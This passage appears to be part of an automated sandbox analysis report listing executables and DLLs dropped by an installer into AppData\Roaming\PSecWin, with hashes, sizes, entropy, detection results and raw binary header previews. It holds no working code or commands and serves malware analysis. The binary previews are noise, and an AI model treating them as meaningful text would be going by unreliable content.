                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}H............................................................................................Rich............PE..L....jg............!.....L...2.......S.......`.......................................8....@A........................0X......(r..........................................T............................................p..$....V..`....................text....K.......L.................. ..`.data........`.......P..............@....idata..d....p.......T..............@..@.didat..$............h..............@....rsrc................j..............@..@.reloc...............n..............@..B................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\dskquoui.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):189440
                              Entropy (8bit):6.221097141099736
                              Encrypted:false
                              SSDEEP:3072:AeJBynLxPazkW2WK0GrQ/EKkSCwL0Yt6OpIDn/DkSnhzSnhwbf:AkynLxCzd2QGXKk9wQYEQID/DnWE
                              MD5:74F5569F0A9F686A31171D0C7339A403
                              SHA1:FB33C76CF931317C41314374120EBAA1C6E34849
                              SHA-256:4394B0AE396B1001671C6748DA7B60B4CF9746A66DC1D83CD68CF0D5853750E7
                              SHA-512:8C9849C394D4917C5EA2B0D26AFFE4CC02E88DDDA9A7789CE627BF5F1872AED270B7603D68670CE828CF9D87621373D9FE6391FC6B293E51D1350E095D30F9D7
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........p..#..#..#..)#...#.."..#..#..#.."..#.."..#.."..#.."..#.."..#..E#..#.."..#Rich..#........PE..L...W.#............!.........4......@..............s......................................@A............................k...8...X...................................."..T...................d...........................4............................text............................... ..`.data...............................@....idata........... ..................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\getuname.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):8704
                              Entropy (8bit):4.810621720665765
                              Encrypted:false
                              SSDEEP:96:9MSvZiG2+XZ9PIzWIY+0y1/wbaDQzf7qfBS9nFJEcMYZcEWIdWwWZ2f:PfJsW7+0AHGfWfBqn7Ec3ZtWIdWH0
                              MD5:8881F8445B35C24DC307561809E15A4A
                              SHA1:1B76C7657AAEAAC45D39B837E2131B5B4113F599
                              SHA-256:0CBEB415A66083408897C5C8D404BFA2B32132CC49C203969125A106AE2C0520
                              SHA-512:3B6C764896F9EA30E1BE38496AAF6F16507034D9AE8D6B87046A9A69197061E56657A1E6FB7A1F57E77E73F93CF962E8F122577AED78FE55D984D37554F176A1
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K...........;...........................................W..........Rich...........................PE..L....\.............!................`........ .....t.........................`.......t....@A............................H...d0.......@.......................P..4.......T............................................0..`............................text...8........................... ..`.data...P.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..4....P....... ..............@..B................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\gp548-win64-mingw.exe (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):42084427
                              Entropy (8bit):7.994182193971576
                              Encrypted:true
                              SSDEEP:786432:86C+y9VGxOJsOooGqv7bHeSHEgMUTeo1Ut6KND/pe9ta8FnvGnu9u:8z+yv+MDSSkgM0ep6Yg9s
                              MD5:428BCB03D849B5140EDCA31C8E8B4874
                              SHA1:FD88969C70F0D166E8B5BADF869543046BC2350A
                              SHA-256:5F226C3CDA030DFFBC99B6603D868CA4A6DD87203F07837394DE08155934D417
                              SHA-512:07DB273C91AD6D74860784D5934D9759B170D403A03AC593C269E0F414545921AF52AB493A21C9CA00B77F721F503EC2A88E8A0273457EB2AF9813E4FDFBA6C7
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...oGXb.................R...<.......^.......p....@..........................`............@......@...................@....... .......p.......................................................`......................."..T....0.......................text....9.......:.................. ..`.itext.......P.......>.............. ..`.data....7...p...8...V..............@....bss.....m...............................idata....... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc........p......................@..@....................................@..@........................................................

                              C:\Users\user\AppData\Roaming\PSecWin\icuin.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):24576
                              Entropy (8bit):5.082615237943708
                              Encrypted:false
                              SSDEEP:384:lHBTJylPhhzEfNBgZhaXnGsSu+Fwh8eJVrEGkntlG3aK63iFgzC:lHBTJghhzEfNBgZhaXhpEo
                              MD5:FB475B41189AACF1C607C1E9DC0EBB0B
                              SHA1:822AC3B64FF9C5A95AA13E8C9022C45D629BD3D4
                              SHA-256:B0EBC9AA38B12138FD4D54DDF65F8BA7AF9D71D24B8BD1F37ED198790F4E19CC
                              SHA-512:F8C571B69BB495A49CB1CB70B36542AEA94BC7A18AC5F3EC0F41D9A57663BF786B225BF16252BE181FCAFEAC129541DEC35951B32E9E0091502BE24C05FF0FD4
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........PE..L...&..............!.........^............................................................@E........................`....U...........p..h...............................T............................................................................text....V.......X..................@..@.rsrc...h....p.......Z..............@..@....&..........."....f...X......&...........d...(f..(X......&...........$....f...X..................&........ ........................... ...!..;!..f!...!...!...!..."..C"..["..z"..."..."..."...#...#..>#..f#...#...#...#..*$..^$...$...$...$..%%..M%..l%...%...%...%..1&..s&...&...&...'..8'..['..y'...'...'...'..1(..R(..i(...(...(...(...(...)..Y)..})...)...)...)...*..3*..T*..|*...*...*...+..E+...+...+...+..),..S,...,...,...,...,..$-..F-..j-...-...-...-......6...W...|................/..4/..

                              C:\Users\user\AppData\Roaming\PSecWin\iesysprep.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):37376
                              Entropy (8bit):5.966343313052938
                              Encrypted:false
                              SSDEEP:384:3snxV0syl9EL+P5bDKsyitrftctswffpTFAHYxSxJsUxR9vF/fA+YgvD7qW+k8xl:e4syYT3xFUxpdKrk8O5LD0vi/FY/x4
                              MD5:F831178A0ACA9969B0AD84D845FDC213
                              SHA1:8153AF847ECCD0CEF31388F903C60AF138C4DB4B
                              SHA-256:3FD12219C578E7AA7FAEFE0848032FC766AC660BBB1A4EE810437A3644012771
                              SHA-512:25E71AFAB049E245B9B05158850E9F6827C47A2E632F467F7B69B203D4381E9B0C74E719012213ABDBE66366BE1DD2610994669067B18BBB47972F2BFEA56CE0
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .`Yd...d...d...p...f...p...j...d...0...p...u...p...e...p...e...p...c...p...e...p...e...Richd...................PE..L....P.............!.....v..........`z..............................................f.....@A................................t...................................$....3..T...............................................p............................text....t.......v.................. ..`.data...t............z..............@....idata...............|..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-0BSQ7.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):120832
                              Entropy (8bit):6.452660436286688
                              Encrypted:false
                              SSDEEP:3072:VUcCdrEZyY755X5YTC81grxQUfZtPrFD:UiyS5JYN1grxQUfZt
                              MD5:267A42F3D8CDF6FCE02BFDA76A724120
                              SHA1:9A17457DAD529419715AC6F092052FF7D1F01469
                              SHA-256:907947FCA16FAB90430F56259EB81EF0609AAAC8166BC174D129945CE78E4A5E
                              SHA-512:64C4D0E54C1D633EF3F7E31B77EA74975FA14A603E1F9590890A9741D23B6430EFC6DD2E8ADF2C0B0E55F8F2B58DF974708A8613198DCB8AD38566B37E579990
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..Eo..Eo..E{..Dc..E{..Dm..Eo..E...E{..D|..E{..Dn..E{..Dw..E{.LEn..E{..Dn..ERicho..E........PE..L....X.Y...........!...............................e................................A.....@A............................).......................................4....F..T...........................(...................|............................text............................... ..`.data...X...........................@....idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-0LBKR.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):67072
                              Entropy (8bit):6.314142155382167
                              Encrypted:false
                              SSDEEP:1536:St/KlpLMTc3WRyIdA2rS7D4NrOI4wlzgB5VdtXgDF3:NLMo3WRyIiwI4kggB5VdtXgDF
                              MD5:0195F2ACF32E1ECDC5AF0E3CF5184373
                              SHA1:993CD3216F983B6D1711CCE77976C71E1B7D6F9E
                              SHA-256:51B3F3BA1A7ABD58BED2C9E9EF67C39592FE585699EFBFE157308AF86F6930CC
                              SHA-512:E922C14E20072993B67DDE391F821E2E58C52D58AE7B194BB999B97C33637FF44597D005ED8E54495D87A4977E3954F00AD07971840115FF9E9343562BB98812
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S..S..S..G...R..G...\..S.....G...@..G...Q..G...R..G...D..G.e.R..G...R..RichS..................PE..L.................!.........0.....................w.........................@............@A........................p...9...H........ ..P....................0..(....!..T........................... ...................D.......`....................text............................... ..`.data...............................@....idata..T...........................@..@.didat..(...........................@....rsrc...P.... ......................@..@.reloc..(....0......................@..B................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-1CLR0.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):7168
                              Entropy (8bit):3.3828878559559703
                              Encrypted:false
                              SSDEEP:96:vKiQPIPmWlhsyNcKXWT6w5qNeWhOWwCP:Ci5PmR+eWhOW
                              MD5:E27BB683A96D3C2338FB46385AB7F2FB
                              SHA1:FE4B1A347EE4B9C55D4A53C24C3FFD51F2547CFD
                              SHA-256:9B47A5D829F7045AF99FFD1F6380870BCE47505B41B9CBA88E94C7FC15B8C7E6
                              SHA-512:7EB8E4AF5F53D1C05F04285CAD928D2FB838E2EA7C6BCE261B668EED6C2E5A9E59ACF5213478A007C9C1D79FC291CE1858151B7E92DD6CF0E0EB4E3EF1043F4A
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\...\...\...\...\...X...\.....\...^...\.Rich..\.........................PE..L...}1u............!......................... .....R.........................@............@E............................P............ .......................0..........T............................................................................data...G........................... ..`.rsrc........ ......................@..B.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-1L3B3.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):37376
                              Entropy (8bit):5.916839934179735
                              Encrypted:false
                              SSDEEP:768:VP+MF9uXFkzxt8xJ0ltub+aTOV6GndP4Nm5f:VNumn8xJga294Ny
                              MD5:83D97778953F5A1A93EA93E644273DC7
                              SHA1:2E86AF4B2BA1D5F5B94B331218B46C6EC9504AE3
                              SHA-256:26A413AB3FDA517896723362E32BCF91EE421D35AA72F5059CF652BB05173F32
                              SHA-512:57E46B3F78887B37480AA041E09B3E08BA4ABD42600B7EE12FE77F2222452431466759BB4F3577C3FB6BF816530C227CFBAADBDB7ADC8C145468B38A7304591F
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!..O...O...O...N...O......O...N...O...L...O...K...O...O...O...B...O...J...O.......O.......O...M...O.Rich..O.........................PE..L....zZh...........!.....n...$.......(..............................................[_....@A.........................u..F...\...................................D.......T...............................................X...\p.......................text...6l.......n.................. ..`.data................r..............@....idata...............t..............@..@.didat..............................@....rsrc...............................@..@.reloc..D...........................@..B........................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-2V0O4.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):1841664
                              Entropy (8bit):6.286587259470902
                              Encrypted:false
                              SSDEEP:24576:E8sHeHKHplfu94i55tbhris2CCEnWaWBvYyozGUIjnRnU:E8Y/Q94iZNrP2t0ZyyIjnRnU
                              MD5:4E35A902CA8ED1C3D4551B1A470C4655
                              SHA1:AD9A9B5DBE810A6D7EA2C8430C32417D87C5930C
                              SHA-256:77222E81CB7004E8C3E077AADA02B555A3D38FB05B50C64AFD36CA230A8FD5B9
                              SHA-512:C7966F892C1F81FBE6A2197BD229904D398A299C53C24586CA77F7F657529323E5A7260ED32DA9701FCE9989B0B9A2463CD45C5A5D77E56A1EA670E02E575A30
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..07.sc7.sc7.scA-.c6.scA-.c<.sc7.rcR.scA-.c.sc!.wb4.scA-.c..sc..pb0.scA-.c6.scA-.c6.scA-.c6.scRich7.sc................PE..d....\.d.........." ................pe....................................................`..........................................-.......$..x................1...............!...................................................................................text...]........................... ..`.rdata...^.......`..................@..@.data........0......."..............@....pdata...1.......2...(..............@..@.rsrc................Z..............@..@.reloc...3.......4..................@..B........................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-39NTG.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):46080
                              Entropy (8bit):5.996220242040934
                              Encrypted:false
                              SSDEEP:768:NXfEQgbKXSjjj/fAU7kpcyiPhZkbzKKkv6H+WnfFV6gWpMUt56Xf5rvZ/qWyIV6H:WVz/vOOsRzUyRR/q2upZm48
                              MD5:539063395EFBB5480C0AC13CC9E5FB16
                              SHA1:772038B6EDE76831AC02444CCD826089283FE0C0
                              SHA-256:18F9DF881FFEB43EBF558CB5BFC2B40BB64E54A2DEE391B79CEBB10173FB41EB
                              SHA-512:7D4CBE926EA364DAFCB7283AC78658ADC0DEE14BF41F1CD584975EA206C90511B155266B554D96175C24B3758DDFB40226BDB53C6EC9BACAC84C654C0A854550
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...q..q..q..x.).s..e...p..e...h..e...v..e...h..q..q..e...z..e.E.p..e...p..Richq..........PE..L.....K..................|...8......pu............@.................................v.....@...... ..........................4...........h............................$..T...............................................0............................text....{.......|.................. ..`.data...,...........................@....idata..j...........................@..@.rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-4HGOQ.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):100352
                              Entropy (8bit):6.268429975218522
                              Encrypted:false
                              SSDEEP:1536:thDj/y2ObZIxMoYye97D4nWkbT5+yYWZO6T5rEBzEzw/QGowH/OmGr:vDjrOYjeFD4nWm5+yjT6dNYUOZ
                              MD5:86AB2A500D974CBBC20EE7FA1F408CEC
                              SHA1:E540DC889F98CC042A53FE67F0D935C675A55D4F
                              SHA-256:6F055C097B986ACDEC861247120C8281C7C67FF5BED40F58E2E921F70E5C6E7A
                              SHA-512:4E7F6D2BEE39D52F4961DD503EE7F7429020EE4AEAF89B0FC18BD7F6615568DAA656A12B1CDED4893452A40C392D196CF3894E0DA8CC0BAD90F9B5DDB767B593
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2..ea..ea..ea...a..ea..f`..ea..a`..ea..da%.ea..d`..ea..e`..ea..l`..ea..``..ea...a..ea..g`..eaRich..ea........PE..L.....dp...........!.....(..........0$.......@......................................&.....@A.........................3..x...hr.......................................7..T...........................(................p..d....0.......................text...(&.......(.................. ..`.data....'...@.......,..............@....idata.......p......................@..@.didat..P............D..............@....rsrc............0...F..............@..@.reloc...............v..............@..B................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-4QT58.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):3756821
                              Entropy (8bit):7.999950735502969
                              Encrypted:true
                              SSDEEP:49152:SPX5+ecyESLsnN+9/mWfUrkNI7YXv4o4pZ54jEoET6aH2xIuueh26VmQ9FTdPTfQ:SPpLqm/mwUQNI7Zp8xTw6vRPTbSclMj
                              MD5:ADF5C26373A00E49DFC8B59678A26851
                              SHA1:5E0D3E43187E8652FE6B7E898AD666C2939F3C38
                              SHA-256:D009598D6F687532EB734A222D9C0D7EAA179655F736F7A7DD3A2DCB7FAB4AD7
                              SHA-512:ADA9E3C6A9EB49ADCCDC07D30B1A3994C84DE0C9DF93EC365D2396E0C06472C31A6FE2BBA45930DC2B384DC36FFF7D858F1692DCE6DCF57A8543F7F86CA5D70E
                              Malicious:false
                              Preview:7z..'...{T.b.R9.....%.......5b..a..f..B.._Yw"#g...V.y......Q...~..n...n.y..|.W\.$..{...q.w}v.0...1()%"!....b+...Fs..%.......R..1.zp.>G...^.q..Uo..,..1.J..Q..rWUl...@...*.12.7]Z..>>&b...-..........p......./H..<..K+.d.!.3Q$l..."IZ.$.*.6nV....G..[h0....:.`....p.....8ro........w...M.P.../.<....J.Sb...^!.3WH.*.....r*..'..I@..P....P7..{.mG.;....*f.C..?...z_22.N;^.k...$PS-......&.^.......[*y........f.>.....U{k.t# .......`...w.E.hhh......&cX...gIMvd...o_.*.gAeO.X..J..%......f1W...q.n....4..t"....W?...&.S.E..h...*<....:-.. s..R....IY.......))..(.l....F..{. x%..P..I;I.._KKC..$.."......I.q...9sG(..^..P..F..V9=.....tc..4....-......eB.......xY..,.i.Z..&=W.b.).u7DweL W...5c.}...'e..|.qnJs.R.....*......k...u_*....yV.?).s.bg..D.v...@ka....<..D..\U92`.m......R..Qp.h...H..Q..........'..h..!.......a...P.R...-Lk.n.R...A..[..A..PG.@..=...z>."..[k........P.`9.;..N........*..A-..).fH.s1l..w.H3.w...G.p.p|.Q.n..._.9..D2...tC.^o..Q.W.U.^f.....,..A...+.Y].b%.q.....b.^...$

                              C:\Users\user\AppData\Roaming\PSecWin\is-4SSD7.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):13312
                              Entropy (8bit):4.892826616280507
                              Encrypted:false
                              SSDEEP:192:gxfhLX5M7OQL44G7Y5SA3h/frhEcCZVvWsP8g3MWq/:e5NTQL44G7YLxryZlWsP8g3MWs
                              MD5:B248B9CE808EEC990F63FBB3B30862EB
                              SHA1:A1C61C2D8A148D2D80E60FC2A55F4CCCAEF91518
                              SHA-256:A813212F242A4C2673ADB62EDD0953FF9F48BA3303AA7093E96E36320797BAD8
                              SHA-512:2A7C511D1A482F306D65C49ECBFF126084D0079CF396F3F0DE01B3460E1A75D90841964CD43F3DB702BC0532BD2D829DF49115C6AE210862546567AD26F2D428
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........&.@.H.@.H.@.H.I...R.H.T.K.A.H.T.L.L.H.@.I.q.H.T.I.C.H.T.H.A.H.T.@.E.H.T..A.H.T.J.A.H.Rich@.H.........PE..L...l0X............!................. .......0...............................p.......Z....@A........................p).......@.......P..8....................`...... ...T...........................8................@...............................text............................... ..`.data...`....0....... ..............@....idata.......@......."..............@..@.rsrc...8....P.......*..............@..@.reloc.......`.......0..............@..B................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-60VI8.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):557056
                              Entropy (8bit):6.204396774559151
                              Encrypted:false
                              SSDEEP:6144:mE7cV3iwbAFRWAbd4nf0H05yqE6Hl0ChW0+ksllAXBu0lWGWUJJQ4t0BHQQf+L+G:d7a3iwbihym2g7XO3LWUQfh4Co
                              MD5:9A1DD1D96481D61934DCC2D568971D06
                              SHA1:F136EF9BF8BD2FC753292FB5B7CF173A22675FB3
                              SHA-256:8CEBB25E240DB3B6986FCAED6BC0B900FA09DAD763A56FB71273529266C5C525
                              SHA-512:7AC1581F8A29E778BA1A1220670796C47FA5B838417F8F635E2CB1998A01515CFF3EE57045DACB78A8EC70D43754B970743ABA600379FE6D9481958D32D8A5AA
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@...........................................`.....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...............r..............@..B........................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-61CCU.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):356864
                              Entropy (8bit):6.703452536404214
                              Encrypted:false
                              SSDEEP:6144:a/SEW2qJHtVqYEJ6pdMZT6KWm1xA+Mko22Anui5j:kI9tV3EMpdQGRwA+92Uj
                              MD5:7C220C7186368E299FA81FBFF8290064
                              SHA1:F18BB3A1ADF29F8CF556B4D02D44F668537964F6
                              SHA-256:742395A3BBB5700067955BA70E29BE33C45C35A25705A071B472FDBBB1523070
                              SHA-512:48CA2D90714E071357B8CDAE2883633F78964D85ED1C45883794A42F160B754110050E7D5706F7C359448D45F2B8627CF2999D4351302A7073F8D930C101C50B
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6@..r!..r!..r!..{Ys..!..fJ.c!..r!.. ..fJ.a!..fJ.x!..fJ.v!..fJ..s!..fJ.[!..fJ..s!..fJ.s!..Richr!..........................PE..L...h>.............!.....|................................................................@A.............................................p...................p..TI.. m..T............................ ..........................@....................text....{.......|.................. ..`.data...T...........................@....idata..^0.......2..................@..@.didat..............................@....rsrc....p.......r..................@..@.reloc..TI...p...J...(..............@..B................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-61DKO.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):37376
                              Entropy (8bit):5.966343313052938
                              Encrypted:false
                              SSDEEP:384:3snxV0syl9EL+P5bDKsyitrftctswffpTFAHYxSxJsUxR9vF/fA+YgvD7qW+k8xl:e4syYT3xFUxpdKrk8O5LD0vi/FY/x4
                              MD5:F831178A0ACA9969B0AD84D845FDC213
                              SHA1:8153AF847ECCD0CEF31388F903C60AF138C4DB4B
                              SHA-256:3FD12219C578E7AA7FAEFE0848032FC766AC660BBB1A4EE810437A3644012771
                              SHA-512:25E71AFAB049E245B9B05158850E9F6827C47A2E632F467F7B69B203D4381E9B0C74E719012213ABDBE66366BE1DD2610994669067B18BBB47972F2BFEA56CE0
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .`Yd...d...d...p...f...p...j...d...0...p...u...p...e...p...e...p...c...p...e...p...e...Richd...................PE..L....P.............!.....v..........`z..............................................f.....@A................................t...................................$....3..T...............................................p............................text....t.......v.................. ..`.data...t............z..............@....idata...............|..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-6DK0L.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):1831424
                              Entropy (8bit):6.562960863651942
                              Encrypted:false
                              SSDEEP:49152:wORUHXxYF3icgea4Zb8nlJq22qT1MTrQyEDAxq4:FR+XxYxhgvc2Dq22gmrNi
                              MD5:61393B3920D949B7A89D8D8623A65BD8
                              SHA1:539EF7897C1A642BAA9353E3B630D35DFC642F5F
                              SHA-256:C70DA787D2857BB08A49327CE75299B6440A75E70BEABC8EFDC4084B779454CE
                              SHA-512:870AD9D39053A6A833A8ECD6F94691CD68839A4C47444D46EDEE0544D58C581D6D1CB821F181F2F9CFAB45C4AECA60CDF8D0D62128E6481319B81724DC4B048D
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'_.]c>..c>..c>..jF..W>..wU..g>..wU..w>..c>...>..wU..j>..wU..W>..wU..b>..wU...>..wU~.b>..wU..b>..Richc>..........................PE..L...g.i...........!.....Z...........`.......p...............................@......._....@A.........................i..................P........................c...Y..T...................l{.......z.......................h..@....................text....Y.......Z.................. ..`.data........p.......^..............@....idata..p............r..............@..@.didat..............................@....rsrc...P...........................@..@.reloc...c.......d..................@..B................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-6EGJL.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):7680
                              Entropy (8bit):3.341098387319522
                              Encrypted:false
                              SSDEEP:48:qoQFOfuKNkpBBhXbVc1u79I+nNNKDzVUNcO1Hy0uFdbocZWPWAuVc5WwHgHq:vQh+kvbbVx9IS4DyNcO1HydFzWsAWwy
                              MD5:110BB11112903EE1BECE36BABA256754
                              SHA1:C0ABCC794F35D6AEB0A2349BAC890BC8BFC47F0A
                              SHA-256:81A6E79F3AC731BB3C7EFBDCAF18DF7662964B8E7907018B1B4551F3562F1B66
                              SHA-512:4EC8E3BF67A73141AB62DA26CE45E5DA170D994A5ECF7A99252F5B58C016B320BDA97BF9FF9AD028B45E9560FDFDE1064046695E3CE930D2EC71473027DC3379
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\...\...\...\...\...X...\.....\...^...\.Rich..\.........................PE..L...'a%............!.........................0.....R.........................P.......A....@..........................................0..0....................@......@ ..T............................................................................data............................... ..`.rsrc...0....0......................@..B.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-86N5H.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):7168
                              Entropy (8bit):3.3223098820671386
